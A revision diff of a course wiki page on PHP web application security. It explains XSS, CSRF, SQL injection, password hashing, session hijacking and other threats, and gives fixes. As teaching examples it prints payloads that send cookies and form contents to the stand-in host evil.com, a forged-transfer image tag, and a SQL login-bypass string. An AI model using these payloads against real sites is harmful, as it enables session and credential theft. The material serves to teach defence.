Difference between revisions of "Web Application Security, Part 1"

From CSE330 Wiki
 
 
Application-level web security is of increasing concern among web developers.  This article outlines some types of security threats to your web application and how to solve those threats.
 
  
This is Part 1 of the Web Application Security article, geared toward the material covered in [[Module 2]].  For material covered in [[Module 3]] (MySQL), see [[Web Application Security, Part 2]].  For material covered in [[Module 4]] (JavaScript), see [[Web Application Security, Part 3]].
+
This is Part 1 of the Web Application Security article, geared toward the material covered in [[Module 2]].  For material covered in [[Module 3]] (MySQL), see [[Web Application Security, Part 2]].  For material covered in [[Module 6]] (JavaScript), see [[Web Application Security, Part 3]].
  
 
== Introduction to Application-Level Web Security ==
 
 
Here's the golden rule: Anything in your site that accepts user input, whether via a form, an AJAX request, a file upload, or even malformed links, can be used as an attack vector.  '''NEVER TRUST USER INPUT!!!'''  This can be summarized in the acronym FIEO, or ''Filter Input, Escape Output''.
 
  
== Cross-Site Scripting ==
+
=== FIEO in PHP ===
  
TODO: Move this to Part 3.
+
==== Filtering Input ====
  
Cross-Site Scripting, or '''XSS''', is when an attacker targets an area of your application in which user-supplied input is included in application output.  The attacker may use JavaScript to read confidential information and send it to their own servers.
+
"Filter Input" means that you should check that input data is of the format that you are expecting.  For example, if you are expecting a number, you should cast it to a float or an int.  If you are expecting a phone number, you should run it through a regular expression (you will learn regular expressions in module 4). For example:
  
There are two types of XSS attacks: '''persistent''' and '''reflected'''.
+
<source lang="PHP">
 
 
=== Persistent XSS ===
 
 
 
''Persistent XSS'' occurs when a web site stores input in a database and displays it to victims later.  Common vectors for Persistent XSS are forum posts and shoutboxes.
 
 
 
For example, consider this code:
 
 
 
<source lang="php">
 
<?php
 
 
 
$res = $mysqli->query("SELECT * FROM shoutbox ORDER BY created_at DESC LIMIT 5");
 
 
 
while($row=$res->fetch_assoc()){
 
echo "<p>".$row["content"]."</p>\n";
 
}
 
 
 
?>
 
</source>
 
 
 
In this example, content from the database is displayed ''verbatim'' to the end user.  This is vulnerable to a Persistent XSS attack.  Suppose the attacker, a computer specialist on contract for BuyShoes.com, typed the following code into the shoutbox:
 
 
 
<nowiki><script> document.location.href = "http://www.BuyShoes.com/"; </script></nowiki>
 
 
 
Everyone viewing the shoutbox will now be automatically forwarded to BuyShoes.com!  The shoe manufacturers will be pleased, but most everyone else will be annoyed.  (Needless to say, XSS can be used for much more malicious things than rogue marketing.)
 
 
 
==== Solution ====
 
 
 
You need to escape the output.  In PHP, you can do this using the <code>htmlentities()</code> function:
 
 
 
<source lang="php">
 
 
<?php
 
<?php
 +
// Cast a number to a float or an int:
 +
$amount = (float) $_POST['amount'];
  
$res = $mysqli->query("SELECT * FROM shoutbox ORDER BY created_at DESC LIMIT 5");
+
// Pass a phone number through a regular expression:
 
+
$phone = preg_match('/^\d{3}-\d{3}-\d{4}$/', $_POST['phone']) ? $_POST['phone'] : ""; // ^ and $ anchor the pattern so the whole string must match
while($row=$res->fetch_assoc()){
 
$safe = htmlentities($row["content"]);
 
echo "<p>".$safe."</p>\n";
 
}
 
 
 
 
?>
 
?>
 
</source>
 
</source>
  
Now, the script would appear as text to the user, and it will not execute.  This Persistent XSS threat has been put to rest!
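As a minimal sketch of the escaping step described above, the helper below wraps <code>htmlentities()</code> so that quotes are escaped as well.  The function name <code>h</code> is hypothetical (it is not part of PHP or of the original example), and UTF-8 is assumed to be the page encoding.

<source lang="php">
<?php
// Hypothetical helper (illustration only): escape a value for output in HTML.
function h($value) {
    // ENT_QUOTES escapes both single and double quotes, which matters if the
    // value is ever placed inside an HTML attribute. UTF-8 is an assumption.
    return htmlentities((string) $value, ENT_QUOTES, 'UTF-8');
}

// The malicious shout from the example above:
$shout = '<script> document.location.href = "http://www.BuyShoes.com/"; </script>';

// The angle brackets and quotes are converted to entities, so the browser
// displays the text instead of running it as a script.
echo "<p>" . h($shout) . "</p>\n";
?>
</source>

Wrapping the call in one small function makes it harder to forget the extra arguments when escaping many values in a template.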
+
==== Escaping Output ====
 
 
=== Reflected XSS ===
 
 
 
Reflected XSS is when a web page accepts input and then displays it immediately as output (without the database intermediate).  Search queries are a common vector for Reflected XSS attacks.
 
 
 
For example, consider the code:
 
 
 
<source lang="php"><nowiki>
 
<?php
 
 
 
echo "<h1>Transaction History for: " . $_GET['username'] . "</h1>\n";
 
 
 
?>
 
</nowiki></source>
 
 
 
This is vulnerable to a Reflected XSS attack.  The attacker could trick the victim into visiting this link:
 
 
 
<nowiki>http://www.bank.com/history.php?username=mothergoose+%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2Fwww.evil.com%2Frecord_cookie%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E</nowiki>
 
 
 
In some ways, this is more mysterious than Persistent XSS, because it's not clear what's going on.  But this is the code that will be displayed on the page:
 
 
 
<nowiki><h1>Transaction History for: mothergoose <script>new Image().src="http://www.evil.com/record_cookie?"+document.cookie;</script></h1></nowiki>
 
 
 
Aye yie yie!
 
 
 
==== Solution ====
 
 
 
To fix this, we again need to escape output:
 
 
 
<source lang="php"><nowiki>
 
<?php
 
 
 
$safe_username = htmlentities($_GET['username']);
 
 
 
echo "<h1>Transaction History for: " . $safe_username . "</h1>\n";
 
 
 
?>
 
</nowiki></source>
 
 
 
And now our Reflected XSS vulnerability has been put to rest.
 
 
 
=== Real-Life Examples ===
 
 
 
* [http://www.xssed.com/news/130/F-Secure_McAfee_and_Symantec_websites_again_XSSed/ F-Secure, McAfee, and Symantec, January 2012] (Reflected XSS)
 
* [http://www.h-online.com/security/news/item/Potential-account-theft-with-XSS-hole-in-eBay-de-1320908.html eBay Germany, August 2011] (Reflected XSS)
 
* [http://www.eweek.com/c/a/Security/Facebook-Bully-Video-Actually-a-XSS-Exploit-121829/ Facebook, April 2011] (Persistent XSS)
 
* [http://news.softpedia.com/news/eBay-and-PayPal-XSSed-Again-159733.shtml PayPal, October 2010] (Reflected XSS)
 
* [http://news.softpedia.com/news/XSS-Flaw-Found-on-Secure-American-Express-Site-159439.shtml American Express, October 2010] (Reflected XSS)
 
* [http://threatpost.com/en_us/blogs/persistent-xss-bug-twitter-being-exploited-092110 Twitter, September 2010] (Persistent XSS)
 
 
 
== Cross-Site Request Forgery ==
 
 
 
A cross-site request forgery (CSRF, pronounced ''sea-surf'') involves a victim, who is logged in to the targeted site, visiting an attacker’s site.  The attacker has code on his site that forces the victim to unwittingly perform actions on the targeted site.
 
 
 
For example, suppose Mother Goose visited Dr. Evil's blog.  Dr. Evil had the following tag embedded in his blog:
 
 
 
<nowiki><img src="http://www.bank.com/transfer.php?dest=dr-evil&amp;amount=5000" /></nowiki>
 
 
 
This would cause Mother Goose to authorize a $5000 transfer to Dr. Evil, completely without Mother Goose's knowledge!
 
 
 
Worse yet, Dr. Evil could just send an e-mail to Mother Goose with this image tag.  All Mother Goose would need to do to be attacked is open the e-mail!  (Now you know why sometimes your e-mail client turns off images from suspicious sources.)
 
 
 
=== Solution ===
 
 
 
The first precautionary measure is to always use POST requests (as opposed to GET requests) for actions that change something on your server.  This will fend off all except the most hard-core CSRF attacks.
 
 
 
However, fully preventing CSRF attacks is not difficult.  To do this, you can use a '''CSRF token'''.  A CSRF token is a known string of text that is submitted in all of the forms on your site.  If the string is not what you expect, then you can assume that the request was forged.
 
  
For example, consider this form:
+
"Escape Output" means that you need to nullify, or ''escape'', characters that have special meaning in the markup language of interest.  For example, consider the following string:
  
<source lang="html">
+
<source lang="html4strict">
<form action="transfer.php">
+
If a<b and b<c then a<c.
<input type="text" name="dest" />
 
<input type="number" name="amount" />
 
<input type="submit" value="Transfer" />
 
</form>
 
 
</source>
 
</source>
  
We can easily add a hidden CSRF token field like so (as well as making the form POST rather than GET):
+
Since a less-than sign means the start of a tag in HTML, and '''b''' is a valid tag name, the above string will ''not'' render as you might expect in HTML.  Therefore, we need to ''escape'' our less-than signs by using HTML entities:
  
<source lang="html">
+
<source lang="html4strict">
<form action="transfer.php" method="post">
+
If a&lt;b and b&lt;c then a&lt;c.
<input type="text" name="dest" />
 
<input type="number" name="amount" />
 
<input type="hidden" name="token" value="<?=$_SESSION['token'];?>" />
 
<input type="submit" value="Transfer" />
 
</form>
 
 
</source>
 
</source>
  
This assumes that <code>$_SESSION['token']</code> contains an alphanumeric string that was randomly generated upon session creation.  We can now test for validity of the CSRF token on the server side (in transfer.php):
+
The "&lt;" is an '''HTML entity''' that will render as a less-than sign. (For more information on HTML entities, [https://webplatform.github.io/docs/html/entities read this article on the WebPlatform wiki].)
<source lang="php">
 
<?php
 
$destination_username = $_POST['dest'];
 
$amount = $_POST['amount'];
 
if($_SESSION['token'] !== $_POST['token']){
 
die("Request forgery detected");
 
}
 
$mysqli->query(/* perform transfer */);
 
?>
 
</source>
 
 
 
Now, if Mother Goose were to view a page containing the malicious <img/> tag, the transfer would not take place.
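The CSRF check assumes that a random token already exists in the session.  One possible way to create and compare such a token is sketched below; the function names are hypothetical, and <code>random_bytes()</code> assumes PHP 7 or later.

<source lang="php">
<?php
// Hypothetical helper: create a random token (64 hexadecimal characters).
function csrf_token_create() {
    // random_bytes() returns cryptographically secure random bytes (PHP 7+).
    return bin2hex(random_bytes(32));
}

// Hypothetical helper: check a submitted token against the expected one.
function csrf_token_is_valid($expected, $submitted) {
    // hash_equals() compares two strings in constant time, so the comparison
    // does not leak how many leading characters matched.
    return is_string($expected) && is_string($submitted)
        && hash_equals($expected, $submitted);
}

// Usage sketch, after session_start():
//   if (!isset($_SESSION['token'])) { $_SESSION['token'] = csrf_token_create(); }
//   if (!csrf_token_is_valid($_SESSION['token'], $_POST['token'] ?? null)) {
//       die("Request forgery detected");
//   }
?>
</source>

The type checks reject a missing or array-valued <code>token</code> field before the comparison takes place.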
 
 
 
=== Real-Life Examples ===
 
 
 
* [http://www.zdnet.com/no-data-breach-in-first-weibo-attack-2062301014/ Weibo (the Chinese Twitter), June 2011]
 
* [http://www.huffingtonpost.com/huff-wires/20110601/us-tec-google-hacking-attack/ Gmail, June 2011]
 
* [http://www.pcworld.com/businesscenter/article/228609/hackers_steal_hotmail_messages_thanks_to_web_flaw.html Hotmail, May 2011]
 
* [http://www.theregister.co.uk/2010/05/19/facebook_private_data_leak/ Facebook, May 2010]
 
 
 
== SQL Injection ==
 
 
 
TODO: Move this to part 2.
 
 
 
http://imgs.xkcd.com/comics/exploits_of_a_mom.png (TODO: embed image here)
 
 
 
 
 
SQL injection occurs when an attacker submits specially-crafted input into your server, which is then included in an SQL query.  The input modifies the query to perform additional actions on the database or to access unwanted information.
 
  
For instance, suppose you had the following code:
+
PHP provides a function that, given a string, will convert special characters to their HTML entity equivalents.
  
<source lang="php">
+
<source lang="PHP">
 
<?php
 
<?php
require 'database.php';
+
$str = "If a<b and b<c then a<c.";
 
 
/* DISCLAIMER: THIS CODE IS BAD IN MANY MORE WAYS THAN JUST
 
BEING VULNERABLE TO SQL INJECTION! IT IS FOR DEMONSTRATION OF
 
CONCEPT ONLY. DO NOT USE THIS CODE IN YOUR OWN PROJECTS! */
 
 
 
$res = $mysqli->query("SELECT id FROM users WHERE username='".$_POST['username']."' AND password='".$_POST['password']."'");
 
 
 
if( $res->num_rows==1 ){
 
    $row = $res->fetch_assoc();
 
    $_SESSION['user_id'] = $row["id"];
 
}else{
 
    echo "Login failed.";
 
    exit;
 
}
 
?>
 
</source>
 
 
 
This code is vulnerable to SQL injection.  For example, suppose the attacker used the following string of text for his username (note the trailing space after the two dashes):

mother-goose' -- 

Here's what the resulting query would look like:

<source lang="mysql">
SELECT id FROM users WHERE username='mother-goose' -- ' AND password=''
</source>

Since <code>--</code> followed by a space is the start of a comment in MySQL, when MySQL interprets this query, it will ''completely ignore'' the password-checking part of the query!  Dr. Evil can log in using anyone's username and steal all of their money!
 
 
 
=== Solution ===
 
  
If you write your queries manually (as in the example above), you need to use <code>$mysqli->real_escape_string()</code> to sanitize your input:
+
// Convert special characters to HTML entities before outputting:
 
+
echo htmlentities($str);
<source lang="php">
 
<?php
 
$safe_username = $mysqli->real_escape_string($_POST['username']);
 
// ...
 
 
?>
 
?>
 
</source>
 
</source>
  
However, the better solution is to use prepared queries.  For more information on prepared queries, see [[MySQL]].
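To make the vulnerability concrete, the sketch below builds the query string the same way as the vulnerable login code, but without contacting a database, so you can see exactly what MySQL would receive.  The input values are illustrative.

<source lang="php">
<?php
// Attacker-controlled input. MySQL only treats "--" as a comment marker when
// it is followed by whitespace, hence the trailing space.
$username = "mother-goose' -- ";
$password = "";

// Same string concatenation as in the vulnerable login code:
$query = "SELECT id FROM users WHERE username='" . $username
       . "' AND password='" . $password . "'";

// Everything after "-- " is a comment, so the password check never runs.
echo $query . "\n";
?>
</source>

With a prepared query, the username is sent to the server separately from the SQL text, so the quote and the dashes are treated as data rather than as part of the query.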
+
'''Note:''' ''htmlentities'' escapes a string for use in HTML, but it does ''not'' escape a string for use in other markup languages.  You need to use different methods when escaping strings for other languages.
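As a rough illustration of the note above, here is the same string escaped for three different output contexts using built-in PHP functions.  Which function is appropriate depends on where the string ends up; the variable names are illustrative.

<source lang="php">
<?php
$str = "If a<b and b<c then a<c.";

// For HTML text or attribute values (UTF-8 is assumed as the page encoding):
$for_html = htmlentities($str, ENT_QUOTES, 'UTF-8');

// For a single component of a URL, such as a query-string value:
$for_url = rawurlencode($str);

// For a JavaScript string literal inside a script block. The JSON_HEX_* flags
// make json_encode() also encode <, >, &, ' and " as \uXXXX sequences.
$for_js = json_encode($str, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);

echo $for_html . "\n" . $for_url . "\n" . $for_js . "\n";
?>
</source>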
 
 
=== Real-Life Examples ===
 
 
 
* [http://www.zdnet.com/unknowns-hack-european-space-agency-4010026071/ European Space Agency, May 2012]
 
* [http://www.dutchnews.nl/news/archives/2012/04/new_online_medical_records_sca.php Dutch Department Stores, April 2012]
 
* [http://www.msnbc.msn.com/id/46735808/ns/technology_and_science-security/ Ancestry.com, March 2012]
 
* [http://www.scmagazine.com.au/News/292592,allphones-hacked-staff-passwords-exposed.aspx Allphones (Australian Telecommunications Retailer), March 2012]
 
* [http://www.abc4.com/content/news/slc/story/More-fallout-Salt-Lake-City-police-website-hacked/PiSspE768UiioitJ3K4gyQ.cspx Salt Lake City Police Department, February 2012]
 
 
 
== Password Security ==
 
 
 
Let's assume for a moment that despite all of your efforts in the other fronts of web security, an attacker was still able to extract information from your database.  If you store your passwords as plain text, not only will the attacker be able to log in as whomever he chooses, but the attacker will ''also'' likely be able to log in as the users of your site on different sites (since many users employ the same password on several different web sites).
 
 
 
=== Encryption ===
 
 
 
The types of encryption and encryption algorithms are a whole class unto themselves.
 
 
 
In CSE330 and future web application development, you should always use '''one-way encryption''' (more accurately called ''hashing'') to protect your passwords.  What this means is that you feed a string of text (a password) to an encryption function, and that encryption function returns another string of text that is a ''digest'' of the password.  It is not feasible to mathematically convert a digest back to its associated password, but encrypting the same password will always yield the same digest.
 
 
 
One-way encryption algorithms can also be ''salted''.  What this means is that the string to be encrypted is modified by a ''salt'' before the encryption occurs.  The same salt and the same password will always yield the same digest.  Using a salted hashing algorithm is preferable to a non-salted hashing algorithm for passwords because although digests cannot be reversed, non-salted digests can be looked up in a rainbow table.
 
  
=== Solution ===
+
=== Why Not to Escape Input ===
  
So, the solution is to store salted, one-way-encrypted passwords in your database.  PHP provides the [http://php.net/crypt crypt()] function to do this for you.
+
Filtering your input is important, as shown above.  However, it is bad practice to ''escape'' your input.  For example, don't do this:
  
<source lang="php">
+
<source lang="PHP">
 
<?php
 
<?php
// This is a *good* example of how you can implement password-based user authentication in your web application.
+
$message = htmlentities($_POST['amount']); // bad practice
 
+
// then store $message in a database, etc.
require 'database.php';
 
 
 
// Use a prepared statement
 
$stmt = $mysqli->prepare("SELECT COUNT(*), id, crypted_password FROM users WHERE username=?");
 
 
 
// Bind the parameter
 
$stmt->bind_param('s', $user);
 
$user = $_POST['username'];
 
$stmt->execute();
 
 
 
// Bind the results
 
$stmt->bind_result($cnt, $user_id, $pwd_hash);
 
$stmt->fetch();
 
 
 
$pwd_guess = $_POST['password'];
 
// Compare the submitted password to the actual password hash
 
if( $cnt == 1 && hash_equals($pwd_hash, crypt($pwd_guess, $pwd_hash)) ){ // hash_equals() does a strict, constant-time string comparison
 
// Login succeeded!
 
$_SESSION['user_id'] = $user_id;
 
// Redirect to your target page
 
}else{
 
// Login failed; redirect back to the login screen
 
}
 
 
?>
 
?>
 
</source>
 
</source>
  
'''Note:''' You may sometimes see functions like [http://php.net/md5 md5()] used to encrypt passwords.  md5() does indeed perform one-way encryption, but it does so without a salt.  '''THIS IS BAD PRACTICE''', because unsalted md5 hashes can be trivially reversed using a rainbow table.  (Just Google for "md5 decrypter".)  Using a salt prevents the effective use of a rainbow table.
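The login example only shows how to ''check'' a password against a stored digest.  As a hedged sketch of the other half, PHP 5.5 and later also provide <code>password_hash()</code> and <code>password_verify()</code>, which generate a random salt and store it inside the digest for you.  This is an alternative to calling crypt() directly, not the method used in the code above, and the sample password is illustrative.

<source lang="php">
<?php
// When the user registers: create a salted digest to store in the database.
// PASSWORD_DEFAULT lets PHP choose its currently recommended algorithm.
$password = "correct horse battery staple";
$stored_hash = password_hash($password, PASSWORD_DEFAULT);

// When the user logs in: compare the guess against the stored digest.
// The salt is read back out of $stored_hash automatically.
$ok  = password_verify("correct horse battery staple", $stored_hash);
$bad = password_verify("wrong guess", $stored_hash);

var_dump($ok);
var_dump($bad);
?>
</source>

Because a fresh salt is generated on every call, hashing the same password twice with <code>password_hash()</code> gives two different digests, and both verify correctly.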
+
The reason this is bad practice is that it permanently ties that string to its final output format.  For example, what if some time down the road you want to support display of that message in a PDF?  You'd need to go back and remove all the HTML entities again.
 
 
=== OpenID ===
 
 
 
One other solution that will solve ''all'' issues related to password security is to not have passwords at all.  This can be achieved using [[wikipedia:OpenID|OpenID]], which allows end users to use their accounts from other sites (e.g. Google, Yahoo, and Twitter) to authenticate on your site.  Not only does this make your life easier in the security realm, but it also eliminates the need for password recovery, etc.
 
 
 
There are many PHP libraries available for OpenID authentication; one such library is the creatively named [http://pear.php.net/package/OpenID OpenID], which you can install using [[PHP#PEAR|PEAR]].  You will need to install some other packages first, some from yum (if using RHEL) and some from pear.  (If you don't install them, PEAR will yell at you.)  These are the commands you need to run in order to install the correct packages (make sure you understand what they do before running them!):
 
 
 
sudo yum install php-mbstring php-bcmath # not necessary on Debian
 
sudo apachectl graceful
 
sudo pear install Crypt_DiffieHellman-0.2.6 Validate-0.8.5 Services_Yadis-0.5.1 OpenID-0.3.3
 
 
 
Here's an example implementation that uses the PEAR package.
 
 
 
'''Login Page:'''
 
<source lang="php"><nowiki>
 
<form action="process_openid.php" method="post">
 
<input id="start" name="start" type="hidden" value="true" />
 
<fieldset>
 
<legend>Sign in using OpenID</legend>
 
<div id="openid_choice">
 
<p>Please select your account provider:</p>
 
<select name="identifier">
 
<option value="https://www.google.com/accounts/o8/id">Google</option>
 
<option value="http://yahoo.com/">Yahoo</option>
 
</select>
 
</div>
 
<p>
 
<input type="submit" value="Sign In"/>
 
</p>
 
</fieldset>
 
</form>
 
</nowiki></source>
 
 
 
'''process_openid.php:'''
 
<source lang="php"><nowiki>
 
<?php
 
require_once 'OpenID/RelyingParty.php';
 
require_once 'OpenID/Message.php';
 
require_once 'Net/URL2.php';
 
 
 
session_start();
 
 
 
$realm = "http://www.yoursite.com/";
 
$returnTo = $realm . "path/to/process_openid.php";
 
 
 
$identifier = @$_POST['identifier'] ?: @$_SESSION['identifier'] ?: null; // note: the @ signs suppress "undefined" notices
 
 
 
$o = new OpenID_RelyingParty($returnTo, $realm, $identifier);
 
 
 
// Part 1: We are processing a login request before visiting the OpenID provider
 
if(@$_POST['start']) {
 
$authRequest = $o->prepare();
 
$url = $authRequest->getAuthorizeURL();
 
 
header("Location: ".$url);
 
exit;
 
}
 
 
 
// Part 2: The user is returning to our site after visiting the OpenID provider's site
 
else {
 
$usid = @$_SESSION['identifier'] ?: null;
 
unset($_SESSION['identifier']);
 
 
 
$queryString = count($_POST) ? file_get_contents('php://input') : $_SERVER['QUERY_STRING'];
 
 
$message = new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP);
 
 
 
$result = $o->verify(new Net_URL2($returnTo . '?' . $queryString), $message);
 
 
if($result->success()){
 
// Login Success!
 
 
// Get the OpenID identifier, which is unique to every OpenID user (i.e. you can use it in your database to
 
// keep track of people between logins), and save it in the session:
 
$_SESSION["openid.identity"] = $message->get("openid.identity");
 
 
// Now redirect to the target page for logged-in users
 
}else{
 
// Login Failed. You can redirect back to the login page or whatever
 
}
 
}
 
?>
 
</nowiki></source>
 
 
 
'''Disclaimer:''' OpenID does have security issues in its own right, especially phishing-type vulnerabilities, but they are almost exclusively tied to the OpenID identity providers (Google, Yahoo, etc), not the OpenID relying party (you).  Using an SSL connection will help to solve many of these security issues.  And ultimately, it's safe to rest assured that profit-driven OpenID providers are quick to respond when such security vulnerabilities are reported.
 
 
 
=== Real-Life Examples ===
 
 
 
Here is a constantly-updated list of sites that do not use proper password security: http://plaintextoffenders.com/
 
 
 
== Session Hijacking ==
 
  
Session Hijacking is when an attacker captures an established session identifier, and then uses that identifier to browse the targeted site under the victim’s identity. The capturing process is often done via XSS.  For instance, suppose Dr. Evil posted the following comment in a Shoutbox:
+
This is why you should ''filter'' strings at the input stage but not ''escape'' them until the final output stage.
  
How about them Cardinals! <script> new Image().src = "http://www.evil.com/record_cookie?" + encodeURIComponent(document.cookie); </script>
+
== Format String Injection ==
  
Everyone viewing the shoutbox will now see Dr. Evil's shout, but they will also unwittingly have their cookies sent to Dr. Evil's server.  Since cookies contain the Session ID, Dr. Evil can use that Session ID to surf the targeted site under anyone's identity.
+
If you like using functions like '''printf''' and '''sprintf''', you may find yourself writing
 
 
=== Solution ===
 
 
 
First, prevent XSS.  Once you've done that, there are some extra things you can do to fend off session hijackers.
 
 
 
==== HTTP-Only Cookies ====
 
 
 
The first is to use the HTTP Only option on cookies, which prevents cookies from being read by JavaScript (and therefore by XSS).  To do this, you can change the <code>session.cookie_httponly</code> option in php.ini, or you can just use <code>ini_set()</code> before you start your session:
 
  
 
<source lang="php">
 
<source lang="php">
<?php
+
printf( "%s", htmlentities($_GET['username']) ); // good example
 
 
ini_set("session.cookie_httponly", 1);
 
 
 
session_start();
 
 
 
?>
 
 
</source>
 
</source>
  
'''Disclaimer:''' The HTTP Only option is relatively new in browsers, so customers using older browsers will not enjoy the extra protection.
+
It is tempting to reduce this to
 
 
==== User Agent Consistency ====
 
 
 
A second thing you can do to help prevent session hijacking is to check the ''HTTP User Agent'' between requests.  Since cookies are sandboxed inside a browser, and a browser's user agent doesn't change unless it is rebooted (except in edge cases), then the user agent should always be consistent throughout a session.
 
 
 
You can test for HTTP User Agent consistency like this:
 
  
 
<source lang="php">
 
<source lang="php">
<?php
+
printf( htmlentities($_GET['username']) ); // BAD example
 
 
session_start();
 
 
 
$previous_ua = @$_SESSION['useragent'];
 
$current_ua = $_SERVER['HTTP_USER_AGENT'];
 
 
 
if(isset($_SESSION['useragent']) && $previous_ua !== $current_ua){
 
die("Session hijack detected");
 
}else{
 
$_SESSION['useragent'] = $current_ua;
 
}
 
 
 
?>
 
 
</source>
 
</source>
  
=== Session Fixation ===
+
Although the second implementation will work for most usernames, it is '''''not''''' correct.  You are essentially making the client-provided username the ''format string'' for printf.  If the username contains a percent sign (%), it will be interpreted as the start of a parameter in the format string, which can cause your script to raise errors.  Worse yet, it is known that certain combinations of format parameters will actually reveal system information in the error log.
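The difference between the two printf calls can be seen without any errors at all.  In the minimal sketch below, the input value is illustrative, and <code>sprintf()</code> is used instead of <code>printf()</code> so the results can be inspected; <code>htmlentities()</code> is left out to keep the focus on the format string.

<source lang="php">
<?php
// Illustrative user input that happens to contain percent signs.
$username = "100%% sure";

// Good: the input is passed as an argument, so it comes out unchanged.
$as_argument = sprintf("%s", $username);   // "100%% sure"

// BAD: the input is used as the format string, so "%%" is interpreted
// as an escaped percent sign and the text is silently altered.
$as_format = sprintf($username);           // "100% sure"

// An input such as "%s" or "%d" would be worse: sprintf() would look for
// arguments that were never supplied, producing a warning or an error
// depending on the PHP version.
echo $as_argument . "\n" . $as_format . "\n";
?>
</source>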
 
 
One word you might hear in the web application security community is ''session fixation''.  In many ways, this is the opposite of session hijacking: rather than the attacker taking on the victim's identity, the attacker forces the victim into taking on an identity of the attacker's choice.
 
 
 
Fortunately, PHP's cookie-based sessions are not as vulnerable to session fixation attacks as are sessions that are passed through the URL.  The same measures that you use to prevent session hijacking should also prevent session fixation.
 
 
 
There is one thing you can do to help mitigate session fixation, though, and it's also good practice: change the name of the default PHP session ID cookie.  To do this, use the function [http://php.net/session_name session_name()] in PHP, or change the '''session.name''' directive in php.ini.
 
 
 
=== Real-Life Examples ===
 
 
 
Application-level session hijacking is not an attack vector frequently observed by high-profile companies, although any site vulnerable to XSS is probably vulnerable to application-level session hijacking.
 
 
 
On the other hand, packet-sniffing session hijacking attacks have numerous examples.  For more information, see [[#Packet Sniffing|Packet Sniffing]].
 
 
 
== Denial of Service ==
 
 
 
Denial of Service (DoS) is probably the most widely used attack vector to date, and the one employed by hacktivist groups like Anonymous.  The concept is simple: flood a target server with more requests than it can possibly handle, resulting in server downtime.
 
 
 
A ''Distributed'' Denial of Service (DDoS) attack is a special kind of Denial of Service attack that involves multiple, unrelated machines sending requests to the server simultaneously.  DDoS attacks are more powerful than "un-distributed" DoS attacks because there are dozens, hundreds, even thousands of machines, all with different IP addresses, all requesting data from your server at the same time; in DoS attacks, there is only one computer doing the attacking.  Hacking groups are known to have millions of machines around the world ready to perform a DDoS attack on command.  It's a very interesting topic to Google about, but beware that you might spend several hours reading web sites if you start!
 
 
 
There are two flavors that a DoS attack can take:
 
 
 
* '''Bandwidth-based:''' Saturate the connectivity link.
 
* '''Packet-based:''' Saturate the processing capability of the equipment.
 
 
 
=== Mitigating DoS Attacks ===
 
 
 
Unlike the other types of attacks we've discussed (or will soon be discussing), DoS attacks cannot usually be prevented by good coding practices. Here are some tips that should help:
 
 
 
* Always keep the most up-to-date software on your server and firmware on your router (if applicable).
 
* If you represent a firm with a lot of resources, '''anycast''' may be an option.  Rather than having your site hosted in just one server, the load of your site will be shared between many different servers.  Anycast systems are expensive, but they help fend off non-hardcore DoS attacks.
 
* You can set up a ''constellation'' of reverse proxy nodes.  You might also benefit from using a web server like Nginx instead of Apache.  For more information on constellation reverse proxy nodes, see: http://blog.unixy.net/2010/08/the-penultimate-guide-to-stopping-a-ddos-attack-a-new-approach/
 
* Limit things like file upload size and CGI scripts.  These are known to be easy targets for DoS attacks.
 
 
 
In short, DoS attacks are not pretty, and there's not any sure-fire way to prevent them.  Just do your best and hope that you don't get attacked by DoS.
 
 
 
=== Real-Life Examples ===
 
 
 
* [http://www.theregister.co.uk/2012/05/21/india_anonymous_cert_ddos/ Indian CERT, May 2012 (DDoS)]
 
* [http://mashable.com/2012/05/20/anonymous-hackers-police-website/ Chicago Police Department, May 2012 (DDoS)]
 
* [http://torrentfreak.com/pirate-bay-under-ddos-attack-from-unknown-enemy-120516/ Pirate Bay, May 2012 (DDoS)]
 
 
 
== Content Spoofing ==
 
 
 
Content Spoofing is when an attacker attempts to mimic the functionality on your site.  '''Phishing''' is when an attacker uses content spoofing to mine information from victims.  For example, victims may log in to the attacker's site, believing that it is your site, giving the attacker the victims' usernames and passwords.
 
 
 
Content spoofing is frequently performed by using misleading URLs.  For instance, consider the following:
 
 
 
* www.bank.com.tr/ansfer.php
 
* www.bank.com/transfer.php
 
 
 
However, content spoofing can also be performed when there is an XSS vulnerability in your site.  If the XSS is Reflected, the injected code could forward to an attacker's site, even though the link belongs to your site.  If the XSS is Persistent, the attacker could either re-write your site or simply modify the Form prototype to send all form data to the attacker's server before submitting the form (that is, at least when the form is submitted using JavaScript):
 
 
 
<script><nowiki> var old_sub=HTMLFormElement.prototype.submit; HTMLFormElement.prototype.submit = function(){ new Image().src = "http://www.evil.com/?"+encodeURIComponent(this.innerHTML); old_sub.apply(this, arguments); } </nowiki></script>
 
 
 
Do you see now how preventing XSS will also prevent several other types of web application attack vectors?
 
 
 
=== Solution ===
 
 
 
Content Spoofing is largely out of your control as a web developer.  You should give users a way to confirm that your site is legitimate.  For example, when logging in to your site, you could have users put in their username first, then show the user a picture associated with their account before asking them to put in their password.  (Or just use OpenID.)
 
 
 
=== Real-Life Examples ===
 
 
 
* [http://kb.cadzow.com.au:15384/cadzow/details.aspx?ID=1422 Several Banks (phishing e-mail scams)]

* [http://www.consumerfraudreporting.org/phishing_examples.php More Banks (phishing e-mail scams)]
 
 
 
== Packet Sniffing ==
 
 
 
HTTP Packet Sniffing is a fundamental web attack that has been known for a long time, but it was never widely exploited.  Essentially, the attacker can listen on his current WiFi connection for packets going in and out, then act as a "man in the middle" to either perpetrate a Content Spoofing attack or just hijack the victim's session.  (This is when user agent testing would prove helpful.)  The Firesheep plugin for Firefox makes it easy to perform Packet Sniffing attacks yourself: just go to Starbucks, open up Firesheep, and you can hijack the session of anyone who is on the same public WiFi.  Scary.
 
  
 
=== Solution ===
 
  
The best and easiest way to prevent packet sniffing is to secure your site with an SSL certificate ('''https''').  This will cause each connection to perform a handshake and encrypt its traffic, preventing Man-in-the-Middle attacks.  SSL certificates have traditionally not been free (you could expect to pay around $100 per year for a small web site), although free certificate authorities such as Let's Encrypt now exist.  Because of the handshakes, encrypted connections also consume slightly more resources.  However, if your site controls sensitive data from users (e.g. credit card information), an SSL certificate is a must.
+
The solution is simple: never put dynamic input as the format string.  It should always be static, either hard-coded or from a stable source like a YAML file. User-supplied input should ''always'' be fed into the string as arguments to sprintf and printf.
 
 
=== Real-Life Examples ===
 
 
 
